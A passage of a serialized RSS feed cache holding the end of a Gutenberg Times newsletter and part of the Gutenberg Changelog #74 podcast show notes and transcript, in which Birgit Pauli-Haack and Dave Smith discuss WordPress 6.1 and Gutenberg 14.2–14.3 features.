/><a href=\"https://asia.wordcamp.org/2023/\"><strong>WordCamp Asia 2023</strong></a></p>\n\n\n\n<p><strong>📣 The next tickets will become available on October 19, 2022</strong></p>\n\n\n\n<p class=\"has-light-background-background-color has-background\"><a href=\"https://central.wordcamp.org/schedule/\"><strong>Have a look at the schedule of upcoming WordCamps</strong></a>.</p>\n\n\n\n<h3 id=\"8-learn-word-press-online-meetups\">Learn WordPress Online Meetups</h3>\n\n\n\n<p>October 17, 2022 – 4 pm EDT / 12:00 UTC<br /><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/288666247/\"><strong>Part 1: Re-Creating Block Designs</strong></a>&nbsp;with Wes Theron</p>\n\n\n\n<p>October 25, 2022 &#8211; 3am EDT / 7am UTC <br /><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/289106740/\"><strong>Uncovering the Cover Block</strong></a></p>\n\n\n\n<p>October 31, 2022 – 4 pm EDT / 12:00 UTC<br /><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/288666280/\"><strong>Part 2: Re-Creating Block Designs</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p>Featured Image: Imajinn AI </p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button type=\"submit\" class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 15 Oct 2022 21:43:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:149:\"Gutenberg Times: Gutenberg Changelog #74 – Gutenberg 14.2, 14.3, WordPress 6.1, Style Variations in Theme Directory, Course on Gutenberg Data Layer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://gutenbergtimes.com/?post_type=podcast&p=22446\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:159:\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:63293:\"<p>Birgit Pauli-Haack and Dave Smith  discuss Gutenberg 14.2, 14.3, WordPress 6.1, Style Variations in Theme Directory and a Developer Course on Gutenberg Data Layer</p>\n\n\n\n<p><a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-69-gutenberg-releases-wordpress-6-0-1-the-create-block-theme/#shownotes\">Show Notes</a> / <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-69-gutenberg-releases-wordpress-6-0-1-the-create-block-theme/#transcript\">Transcript</a></p>\n\n\n\n<ul>\n<li>Music:&nbsp;<a href=\"https://soundcloud.com/xirclebox\">Homer Gaines</a></li>\n\n\n\n<li>Editor:&nbsp;<a href=\"https://www.linkedin.com/in/sandy-reed/\">Sandy Reed</a></li>\n\n\n\n<li>Logo:&nbsp;<a href=\"https://markuraine.com/\">Mark Uraine</a></li>\n\n\n\n<li>Production:&nbsp;<a href=\"https://icodeforapurpose.com\">Birgit Pauli-Haack</a></li>\n</ul>\n\n\n\n<p class=\"has-larger-font-size\" id=\"shownotes\"><strong>Show Notes</strong></p>\n\n\n\n<p><strong>Special Guest: Dave Smith</strong></p>\n\n\n\n<ul>\n<li>Dave Smith&#8217;s <a href=\"https://www.youtube.com/DaveonWP\"><strong>YouTube Channel Dave on WP</strong></a> </li>\n\n\n\n<li><a href=\"https://www.youtube.com/watch?v=e399jQagyTQ\">How to EASILY find all CHANGES coming to WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://www.youtube.com/watch?v=Bqj2J1QYYoI\">Presentation: Gutenberg Now, Next and How to Use it Better Today</a></li>\n</ul>\n\n\n\n<p><strong>WordPress 6.1 </strong></p>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">WordPress 6.1 RC1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">Fieldguide WordPress 6.1 </a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/10/changes-to-block-editor-preferences-in-wordpress-6-1/\">Changes to block editor preferences in WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/10/extending-the-query-loop-block/\">Extending the Query Loop block</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/04/block-based-template-parts-in-traditional-themes/\">Block-based “template parts” in traditional themes</a> </li>\n\n\n\n<li>Tutorial: &nbsp;<a href=\"https://gutenbergtimes.com/building-a-block-based-header-template-in-a-classic-theme/\">Building a Block-Based Header Template in a Classic Theme</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/roster-of-design-tools-per-block/\">Roster of design tools per block</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/03/fluid-font-sizes-in-wordpress-6-1/\">Fluid font sizes in WordPress 6.1</a></li>\n</ul>\n\n\n\n<p><strong>Community Contributions</strong></p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/23/client-side-webassembly-wordpress-with-no-server/\">Client-side WebAssembly WordPress with no server</a></li>\n\n\n\n<li><a href=\"https://meta.trac.wordpress.org/ticket/6059\">Beta: Display style variations for block themes in the theme directory</a></li>\n\n\n\n<li><a href=\"https://wordpress.org/themes/twentytwentytwo/?beta=style_variations\">https://wordpress.org/themes/twentytwentytwo/?beta=style_variations</a></li>\n\n\n\n<li>Learn.WordPress Course: <a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a></li>\n</ul>\n\n\n\n<p><strong>Gutenberg Plugin 14.2</strong></p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/09/30/whats-new-in-gutenberg-14-2-28-september/\">What’s new in Gutenberg 14.2? (28 September)</a></li>\n\n\n\n<li><a href=\"https://wptavern.com/gutenberg-14-2-improves-writing-flow-adds-kerning-controls-for-headings-in-global-styles\">Gutenberg 14.2 Improves Writing Flow, Adds Kerning Controls for Headings in Global Styles</a></li>\n</ul>\n\n\n\n<p><strong>Gutenberg Plugin 14.3 </strong></p>\n\n\n\n<p><strong>Release lead</strong>: Aaron Robertshaw</p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\">What’s new in Gutenberg 14.3? (12 October)</a></li>\n\n\n\n<li><a href=\"https://wptavern.com/gutenberg-14-3-improves-image-drag-and-drop\">Gutenberg 14.3 Improves Image Drag and Drop</a></li>\n</ul>\n\n\n\n<p><strong>What&#8217;s in the Works?</strong></p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/38275\">Navigation Project Tracking Issue</a></li>\n\n\n\n<li><a href=\"https://github.com/WordPress/gutenberg/issues/44720\">Tracking: additional layout options, design tools and refinements</a></li>\n</ul>\n\n\n\n<p class=\"has-large-font-size\">Stay in Touch</p>\n\n\n\n<div class=\"is-layout-flow wp-block-group\"><div class=\"wp-block-group__inner-container\">\n<ul>\n<li>Did you like this episode? <a href=\"https://lovethepodcast.com/gutenbergchangelog\"><strong>Please write us a review </strong></a></li>\n\n\n\n<li>Ping us on Twitter or send DMs with questions. <a href=\"https://twitter.com/gutenbergtimes\">@gutenbergtimes </a>and <a href=\"https://twitter.com/bph\">@bph</a>.</li>\n\n\n\n<li><em>If you have questions or suggestions, or news you want us to include, send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a>. </em></li>\n\n\n\n<li><em>Please write us a review on iTunes! <a href=\"https://gutenbergtimes.com/itunes/\">(Click here to learn how)</a></em></li>\n</ul>\n</div></div>\n\n\n\n<p class=\"has-large-font-size\" id=\"transcript\"><strong>Transcript</strong></p>\n\n\n\n<p><em> </em></p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Hello, and welcome to our 74th episode of the Gutenberg Change Log podcast. In today&#8217;s episode, we will talk about Gutenberg 14.2 and 14.3 plugin releases, WordPress 6.1 release candidate, style variations in the theme directory as a beta, a developer course on Gutenberg data layer, and so much more. I&#8217;m Birgit Pauli-Haack, curator at the Gutenberg Times and WordPress developer advocate. And my guest today is Dave Smith, a JavaScript engineer and full-time core contributor on the Gutenberg project, sponsored by Automattic. Good afternoon, Dave. Thanks for joining me today. How are you?</p>\n\n\n\n<p><em>Dave Smith</em>: Hi, Birgit. Yeah, I&#8217;m doing really well, thank you. And it&#8217;s great to be able to join you on the show again.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, although you have been a guest on the Change Log before we always get new listeners. And so maybe you could tell us briefly about yourself and what you are working on at the moment.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, sure. I&#8217;m a developer living from and working in England in the United Kingdom. And as you mentioned before, I&#8217;m sponsored by Automattic and I work full-time on the Gutenberg Project. So my primary focus tends to be the navigation project, which I&#8217;ve been on for the 6.1 cycle, and that&#8217;s now encompassing all aspects of managing navigation in the editor, including the nav block. I also run a YouTube channel, which is Dave on WP, where I post regular videos on all aspects of the block editor. And most recently I&#8217;ve been working on an overview video for all the key features coming to WordPress 6.1, so if anyone would like to check that out, then they can have a look at the channel, which is youtube.com/c/daveonwp, and I&#8217;m sure we&#8217;ll have that link in the show notes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, of course we do put a link in the show notes. Yeah, and I found great videos about the work on the navigation block there. They were very helpful getting into the problem space and why it&#8217;s all so difficult to solve. So thanks for putting them together.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: No problem, yeah.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. Oh, there was also another video, I watched your presentation that you gave to an agency team that is starting out adopting the block editor for their work, and they had some interesting questions for you. So what was your takeaway from the discussions with the group?</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, so that was the discussion I had with Corner Shop Creative, I believe. Yeah, they were brilliant, they were such a great team. They had loads of questions, I think the Q&amp;A ended up being longer than the actual presentation itself, actually.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: That&#8217;s a good thing.</p>\n\n\n\n<p><em>Dave Smith</em>: Yes, it was a good thing. I always think it&#8217;s a good sign. But that team had, they really fully embraced the block editor, but they&#8217;re butting up against some of the same problems we hear a lot about, styling and curation of content. An example that came up was this possibility of having a synced block pattern, which could be updated with styling changes after the fact. As you know, once you insert a pattern, it&#8217;s a one time action. Once it&#8217;s done, it&#8217;s done. You can&#8217;t go back and then update it. So every time the client wants to update their styles, they have to go through all of the instances of the pattern and update them so you that you can see how that&#8217;d be a bit of a headache.&nbsp;</p>\n\n\n\n<p>So I don&#8217;t see any really good way to deal with that yet apart from inheriting all the styles from global styles instead of applying bespoke ones to the pattern itself. But it&#8217;s certainly a tricky problem anyway, it illustrates that we still have some ways to go to solve all these real world use cases that folks are running up against.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, updating prior work was actually a pain point that I also heard at WordCamp Europe as well as WordCamp US, where it&#8217;s not only the pattern but it&#8217;s also when you have a theme that was modified, the template was modified, when the theme is updated through a theme shop, the user doesn&#8217;t get the new templates because they override it through their user stuff. That also a good problem to solve because if they update the template and. although it was changed by the user, they&#8217;re not getting the new features in there, whatever that&#8217;s in there. So it&#8217;s kind of a tricky bit there. Yeah.&nbsp;</p>\n\n\n\n<h3><strong>Announcements</strong></h3>\n\n\n\n<p>So yeah, you mentioned it, let&#8217;s discuss WordPress 6.1 release cycle for a bit before we head into the Gutenberg plugin releases. Do you want to start out with that?</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, absolutely. So I think we&#8217;ve had the RC1 on the 11th of October, 2022. We&#8217;re recording on the 14th, I think, today. So yeah, it&#8217;s time to perform those final reviews and get testing on that. As usual, we don&#8217;t recommend running this on a production or mission critical website, I think we all know that by now, but just in case. And we&#8217;ve got the final release of this 6.1 is going to be out on the 1st of November, 2022, all being well.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, there&#8217;s some people who say, &#8220;Well, I&#8217;m not going to update until 6.1.1 is out,&#8221; but yeah, I hear there.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, well, I mean there&#8217;s absolutely loads of changes in this release. I think there&#8217;s some stat of 1,700 PRs merged or something like that, so there&#8217;s absolutely a load of features coming down the line. But also bug fixes and tooling and testing changes, I think it&#8217;s going to be a really strong release. Do you agree?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, yeah, I agree. Yeah, there are countless changes for the content creators, and we talked about those in the last six or seven episodes when we discuss the Gutenberg plugin releases. But so almost all features from the plugin releases 13.1 through 14.1 will make it or made it into the WordPress 6.1. It&#8217;s already, as you said, in release candidate. So feature freeze was beta one, release candidate one is actually string free. So the army of polyglot contributors that translate all the new things coming to WordPress between now and the final release can be sure that they don&#8217;t have to do it again when there are additional string changes there. So that&#8217;s string free. So it&#8217;s pretty clear.&nbsp;</p>\n\n\n\n<p>So there are two or three things that didn&#8217;t make it in there as I discovered, there was a zoom out window, the table of contents block is not in 6.1, and also the theme support for the appearance tool for classic themes that didn&#8217;t make it into 6.1. They need some more testing or some more refinement before it goes out to millions of users. And I just realized that 6.0, WordPress 6.0, was already downloaded a hundred million times.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Wow.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: So the counter resets in about a month&#8230; No, about two weeks, for 6.1, but then we know the final number. So the field guide for WordPress 6.1 has been published and I counted 19 developer notes about the block editor and block based themes, that&#8217;s double the amount of developer notes for 6.0. There&#8217;s also a separate field guide for performance update from the performance team. Awesome work there. And also a separate post that lists all the accessibility changes coming to WordPress 6.1 by Anne McCarthy, and I think she lists about 50 different changes that were coming. So Dave, what are the features that you are most excited about this release?</p>\n\n\n\n<p><em>Dave Smith</em>: Oh, there&#8217;s so much. I&#8217;ve just been going through all these changes for WordPress 6.1 actually, and there&#8217;s just so many great things. But I think probably the biggest thing that I think people will notice when they download 6.1 for the first time is just how many more design tools are available across the blocks in 6.1. There&#8217;s been a big push throughout the 6.1 cycle to roll out all the standardized tools for blocks for things like color, typography, layout, spacing, and that kind of thing. And I think now that&#8217;s really coming to fruition. I think we&#8217;re only 50% of the way through all the blocks apparently, I read the last ticket, but it&#8217;s surprising what a difference that makes compared to 6.0.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Absolutely. Absolutely. Yeah. And I actually put, I&#8217;m so excited about it, I put a table together with all the core blocks and so you can see all the core blocks and then typography, color controls, dimension controls, border controls, and layer controls, and then you see which block has what. So that&#8217;s in the dev nodes as well.</p>\n\n\n\n<p><em>Dave Smith</em>: Oh, that sounds brilliant. Yeah, I&#8217;ll have to look that up. Yeah, well the other thing I wanted to have to talk about was the&#8230; Something that I think will help increase adoption rates for block editing, and that&#8217;s the ability to utilize and edit template parts in classic themes. And first time I heard it I thought, &#8220;Oh, what&#8217;s the point of that? It sounds a bit strange.&#8221; But actually I found that it affords a lot of power, because what it enables you to do is things like make your header or your footer fully editable whilst not requiring our users to have to fully deal with and embrace the full site editor experience. So I was testing this out and I had to go at converting the 2020 theme to allow me to be able to edit the footer. And it was so easy to do, but yet it opened up such an amazing thing because normally if you want to edit just something as simple as the text and the footer, you&#8217;d have to create an option and create a new setting in your theme and do all that sort of thing. And now you can just go in and at the footer text, click save, and it&#8217;s done. And so actually I think it&#8217;s a bigger win than you might expect when you hear that for the first time.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, absolutely. Absolutely. And Justin Tadlock actually did a little tutorial when he did the same thing that you did. I think he converted the 20&#8230; No, he converted the 2021 with some block parts and had a hero image of the header and all that. So that is actually published several weeks ago at the Gutenberg Times website. So I will add that link also to the show notes. But it goes really through the whole problems that he encountered also with CSS, because sometimes you need to update the things and that&#8217;s expected, but also how little there was to update. And he also added a few patterns to it and how you can do that. So that&#8217;s a great tutorial if you want to check that out. Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: Absolutely. Justin&#8217;s articles are always really good, isn&#8217;t it? So I&#8217;ll definitely be looking at that.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: There&#8217;s one more thing actually you want to call out, if I may.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, sure.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: And this one, I think, has flown slightly under the radar on this release, but it&#8217;s actually the syncing of editor preferences across devices. So I mean you&#8217;ll be familiar that you can do things like set the persistent list view or you want top toolbar mode within the editor. But in 6.0 these rules just saved locally to the device you were on. So if you went and then switched to a new device, all those changes would be lost, you&#8217;d have to reapply those references, which is kind of annoying. So with 6.1, however, they&#8217;ve now updated it so the changes are saved to the database. So that means that they&#8217;re going to apply across all your devices. So if you&#8217;re at work and you set top toolbar mode at work, you come home, log onto your home laptop, and it&#8217;s going to be exactly the same there. So it&#8217;s a nice quality of life improvement then. And big shout out to Daniel Richards who really spearheaded all the work in that area.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, I think there will be a sigh of relief for millions of block editor users that have said, &#8220;Yeah, I know the welcome guide. Yeah, go away. Let me go on with my work.&#8221;&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Absolutely.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, it&#8217;s really a great. But I also feel that it&#8217;s the right time to actually implement that because now the full range of preference tools is actually known. And then also figure out, okay, how all these editor, being the site editor, being the post editor. Yeah, how they handle those preference tools before you&#8217;re actually put it persistently in a database. I think that&#8217;s a good&#8230; The local storage was a good solution for interim, but now that it&#8217;s in a database now plugins and others can actually also know about that and help them modify that. So for developers in 6.1, there are great improvements on the controls for theme JSON, of course the typography and border controls and color for links coming also there.&nbsp;</p>\n\n\n\n<p>But the most important thing that I feel is the query loop block extensions that the developer can now create a block variation for the query loop block and define, with the attributes, the customization of the list of posts, custom post types, or pages. And so theme developers working on more complex sites will hopefully make good use of that. I think the ease of style variations for theme developers is also&#8230; You can use them for classic themes. No, we talked about that. Yeah, style variations for the block themes are definitely good, coming to 6.1. They were actually for 6.0 already there, the default theme has it. But the default theme now is actually a base theme and now has 10 variations built from the community that come with a default theme. So I&#8217;m really excited about that. Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, that&#8217;s a pretty amazing thing, that 2023 theme, I think something like 38 contributions and ended up being with 10 different variations. Amazing. A new way of generating default themes for WordPress. I think it really points to the future.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And I&#8217;m not sure if you should just keep that default theme, kind of change the name to default theme and just add variations in every area.</p>\n\n\n\n<p><em>Dave Smith</em>: There&#8217;s variations now. Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And do a shout out to the community and say, &#8220;Okay, now it&#8217;s time to show us the best variations,&#8221; and then we add it to them theme or something like that. I also saw theme developers that submitted quite a few style variations, build a child theme, and submitted that to the repository with their style variations in it. So you get, even if the design team just selected 10 of them, you get to see even more style variations for it. So it&#8217;s definitely quite some creativity going on in the community about that. Which brings us to our community contributions section of the site. Dave, you brought some with us.</p>\n\n\n\n<h3><strong>Community Contributions</strong></h3>\n\n\n\n<p><em>Dave Smith</em>: Yeah, I found quite a few community contributions this week, actually. So the first one I want to chat is about is client side web assembly, WordPress with no server. It&#8217;s sort of a click bait-y title if I ever heard one. But this was a post on make blog by Adam Zielinski. And what it is is it is what it says on the tin, WordPress running completely in the browser with no web server whatsoever. And probably most of your listeners will be familiar with WordPress, traditionally you have a web server and your browser sends&#8230; When you click on something like posts, it&#8217;s going to send a request to that server and the server&#8217;s going to respond with the answer. But of course if something happens like you go offline, then you can&#8217;t reach the server anymore, and therefore your site doesn&#8217;t work. And that&#8217;s always how WordPress has worked.</p>\n\n\n\n<p>What Adam&#8217;s done is been very, very clever and he&#8217;s used the technology called web assembly, which is a low level assembly like language similar to C or C++ or whatever. And basically what he&#8217;s done is he&#8217;s taken the PHP that comprises the WordPress software, compiled it down to web assembly, packaged it up in a bundle, and then run it completely in the browser. Then any requests that go out that would normally go out to WordPress get trapped by a service worker and it get reroutes them to this in browser version of WordPress. Sounds all very, very clever and you think, &#8220;Oh well, great experiment,&#8221; but it&#8217;s actually got some real world opportunities there, I think. Especially around learning WordPress in the browser. I don&#8217;t know if you saw that post, Birgit.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh yeah, I actually reviewed it and had some questions for Adam before he published it. And I also tested some of the things. So it&#8217;s really amazing and I can imagine the opportunities are probably endless, but definitely when you have tutorial type posts, you can add that to it and people can then, in real time, make some changes to the code that they&#8217;re just learning or just reading about and then see how it impacts a website without having to spin up their own local, without any build tools, without any downloading of Gutenberg or something like that to see that all happening. And so it&#8217;s a much faster way to learn and see how things working, instead of&#8230; And then figure out how you add it to your own code. Yeah, yeah, so really I hope&#8230; And I saw Adam in between announcing, I ran into some browser freezes and browser&#8230; Because the bundle, of course, is also pretty big. If you have downloaded WordPress before, it&#8217;s about four or five megabits. And if you load that in a browser and in your memory of your local system, yeah, you need some heavy lifting there. And if you do some more, it kind of poops out on you, so to speak. Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, exactly. Yeah, I mean that&#8217;s definitely why I think this is a first sort of prototype. I know Adam and colleagues are looking for people to start contributing and trying to make this more practical in real word usage. So if anyone is interested in that, then the link to that post will be in the show notes for this episode. I&#8217;m also going to be diving into the topic a little bit greater detail with Adam on my YouTube channel, so if you&#8217;re interested in that.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh, right, yeah. Excellent, yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: I&#8217;m sure you can see that video at some point.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, looking forward to that, yeah. So another community contribution is actually that the Meta team just released a beta version of displaying style variation in the theme directory. There&#8217;s a track ticket that was opened by Carolina Nemark, a full site editing expert if you need one. And so you can browse examples with a 2022 theme. I put the link in there. So the developer Steve Dufresne commented on the ticket, so to turn on the feature add ?beta-style_variations to the URL. And then the URL gets updated when you browse themes. So you&#8217;ll need to re-add that string, however, for each theme page to reload.&nbsp;</p>\n\n\n\n<p>So what I really like is that it&#8217;s now an increase of interactivity on the theme directory to help site owners to decide which theme they want to take. And every time you click on the little style variation card underneath the screenshot, the screenshot actually changes into displaying that style variation on the screenshot. So it&#8217;s quite fascinating and I&#8217;ve spent quite some time browsing themes that already have style variations in there. So if you don&#8217;t see a style variation, probably the theme doesn&#8217;t have some, but you find the best way&#8230; I saw maybe six or seven themes in there, but of course I didn&#8217;t browse all 160 block themes anymore. But yeah, try it out. I put the link to the track ticket into the show notes, so you can also see the string that you need to add there and a link to the 2022 theme so you can see all the style variations without downloading it. Yeah, let me know what you think about it. Yeah, I&#8217;m totally stoked about that.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, sounds really good. Well, the more themes that are adding these style variations, the more we&#8217;re going to need to have stuff like that in the theme directory. Yeah, great to see that happening. One more thing, community contributions this week is a new course on Learn.WordPress, which is the official sort of tutorial site for WordPress. And this is a new course on WordPress data layer and specifically the Gutenberg data layer. So for those who don&#8217;t know, the data layer is used throughout the block editor to read and write data. So for example, if you need a list of posts or you want to create new post, edit a post, you&#8217;re going to need to use the data layer at some point. And really that means it&#8217;s essential learning if you want to make anything more than the most basic of blocks.&nbsp;</p>\n\n\n\n<p>So this is a full course which covers not only the basics of the data layer but also best practices and some more advanced usages. I know the author, again, it&#8217;s Adam Zielinski, who&#8217;s been prolific recently. And he&#8217;s extremely knowledgeable in this topic so I&#8217;m confident there&#8217;ll be a great investment for anyone who&#8217;s got the time to look at that course. And the link, again, is going to be in the show notes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, it&#8217;s great for any developer who has ambition in that. Yeah, definitely requires an advanced JavaScript and req knowledge to get through that course.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, but not everybody is there yet. So very soon, hopefully in the upcoming weeks, there&#8217;s an introduction to block development course coming up. And it gets you from almost zero to block building a real life example, like a multi-column block when you have a text and then it kind of distributes itself over the multiple columns. So yeah, this is the Adam Zielinski fan show because Adam Zielinski also send in, I think, three dev notes on Monday that we were able to put in the field guide. So there&#8217;s definitely some great work for developers in the works or in the 6.1.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Absolutely.</p>\n\n\n\n<h3><strong>What’s Released</strong></h3>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: All right, so that brings us to the Gutenberg plugin releases 14.2 and 14.3. Let&#8217;s start with 14.2, release lead was Michal Czaplinski, who also published a release post on Make Blog, and of course another show note link. It entailed about 80 PRs, 15 enhancements, 24 bug fixes amongst them. And some of them even made it into the release candidate 6.1 that were back ported to the core. It&#8217;s a fairly small release now compared to the last two releases. I remember 14.1 had over 383 PRs.&nbsp;</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, it&#8217;s not quite that big.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: That was quite epic. But of course there was a rush to get all the features in to make the feature freeze of beta one. And then nevertheless, there are great enhancements, made it into the plugin. And Dave, what are the key features that were merged in the plugin?</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah, so for 14.2 we had smarter pattern suggestions for the query loop block variations, we&#8217;ve got improvements to the writing flow, a more polished calendar block, new banners and footers, block pattern categories, and auto completion for links is now in all blocks.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, that sounds terrific. So let&#8217;s discuss them one at a time. So there is also letter spacing for the global styles, so you can now, for the heading, and you can now put them in the theme JSON file to have not only letter spacing but also font family selection and the other typography, which is letter like height, case for the headings like sentence case or title case or no case at all. So that&#8217;s all for the headings. And I think the letter spacing didn&#8217;t make it into 6.1, the others you find in the headings. Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: We&#8217;ve also got another PR, which is switching us to using numbers instead of T-shirt sizing for labels for spacing presets. So if you&#8217;re changing something like padding or margin, there&#8217;s a little slider and you can slide between small, medium, large, extra large. That was deemed to be too complex, potentially, and had some accessibility concerns, so they&#8217;ve reversed just numbers, so zero, one, two, three, four, five.&nbsp;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Oh, okay. Yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: It&#8217;s simple.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: It&#8217;s simpler, yeah.</p>\n\n\n\n<p><em>Dave Smith</em>: Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And there is another quality of life change that made it into, and that is hiding the floating block UI when typing. It was always going away but it now also hides the insert, so there is no distraction coming up when you type on a paragraph block or in any other blocks for that matter. I think that&#8217;s really important because that&#8217;s one of the big concerns for writers, that there is so much distraction, especially when they start out, every time they move the mouse something appears and then there&#8217;s gone until they see what it was. And it&#8217;s kind of disconcerting sometimes for writers when they start out with the block editor. So I like 